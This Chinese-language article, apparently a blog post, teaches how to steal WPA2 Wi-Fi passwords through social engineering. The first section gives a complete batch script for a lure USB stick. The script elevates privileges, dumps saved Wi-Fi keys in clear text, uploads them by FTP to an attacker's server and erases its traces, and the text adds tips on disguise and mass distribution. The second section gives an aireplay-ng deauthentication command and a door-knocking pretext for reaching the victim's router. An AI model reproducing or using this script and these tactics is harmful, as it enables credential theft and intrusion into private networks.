什么是社工？社工是一种根据利用受害者心理缺点，如下意识、求知欲、责任心、信赖、贪欲等开展例如蒙骗、盗取、操纵等非法行为的一种拒绝服务攻击。在无线 *** 安全性中也能够利用社工保证很多操作错误。下边举好多个利用社工盗取wpa2登陆密码的事例：

0×01 移动存储设备进攻

*** 小容积u盘，在u盘中储放一个bat批处理文件，并取名为引诱人打开的题目，如：windows电脑优化、私人照片这些。实际上bat文件的內容是这一：

@echo off

>nul 2>&1 "%SYSTEMROOT%\\system32\\cacls.exe" "%SYSTEMROOT%\\system32\\config\\system"

if '%errorlevel%' NEQ '0' (

goto UACPrompt

) else ( goto gotAdmin )

:UACPrompt

echo Set UAC=CreateObject^("Shell.Application"^) > "%temp%\\getadmin.vbs"

echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\\getadmin.vbs"

"%temp%\\getadmin.vbs"

exit /B

:gotAdmin

if exist "%temp%\\getadmin.vbs" ( del "%temp%\\getadmin.vbs" )

md c:\\win

netsh wlan export profile key=clear folder=c:\\win

echo open 服务器ip>C:\\config.txt

echo user 账户>>C:\\config.txt

echo 登陆密码>>C:\\config.txt

echo mput c:\\win\\*.xml>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo yes>>C:\\config.txt

echo bye>>C:\\config.txt

ftp -n -s:"C:\\config.txt"

del C:\\config.txt

del C:\\win\\*.xml

del %0

这一bat脚本会载入该设备联接过的wifi信息内容（包含登陆密码）装包到一个文件夹名称里并所有put到 *** 服务器上，随后删掉印痕和本身避免 *** 服务器数据泄露。最终 *** 攻击就可以在自身的ftp服务器里选择自身钟意的wifi了。

进攻演试：

开启此脚本 ***

弹出来cmd页面，一秒后消退（太快不太好截），bat脚本也随着消退

查询ftp服务器

wifi信息内容早已put上去了

进到 *** 服务器开启一个xml文件

就取得了登陆密码

能够自身在里面加上作用使社工实际效果更强，比如脚本 *** 名字取名为某某某企业有奖活动调查问卷，并加上开启问卷调查的指令，使进攻不露痕迹。

若 *** 攻击将脚本 *** 拷入好几个U盘后普遍撒网捕鱼，就可以得到该大城市的很多wifi信息内容，危害巨大。

0×02 直接接触受害人

1.应用Deauthentication进攻

aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0

在下班了歇息的情况下（这个时候广泛在应用互联网）对受害人应用断开连接进攻，等一小时后去叩门，了解互联网是不是常见故障，了解互联网是哪个企业配备的，随后宣称自身的互联网也常见故障了，是一样的企业，随后了解报障电話并拨通，实际上拨通的是别人或压根沒有拨通，随后装作是质保工作人员提醒让自身路由器重启， *** 攻击就可以触碰到受害人无线路由器，好运气得话无线路由器反面有pin码，就可以撤离了。要是没有， *** 攻击就进一步施加压力，装作被质保工作人员提醒打开路由器管理 *** 页面在管理 *** 页面路由器重启，乘飞机见到登陆密码。重新启动结束后手机上ssh连接kali终止进攻，导致重新启动取得成功恢复互联网的错觉，随后撤离。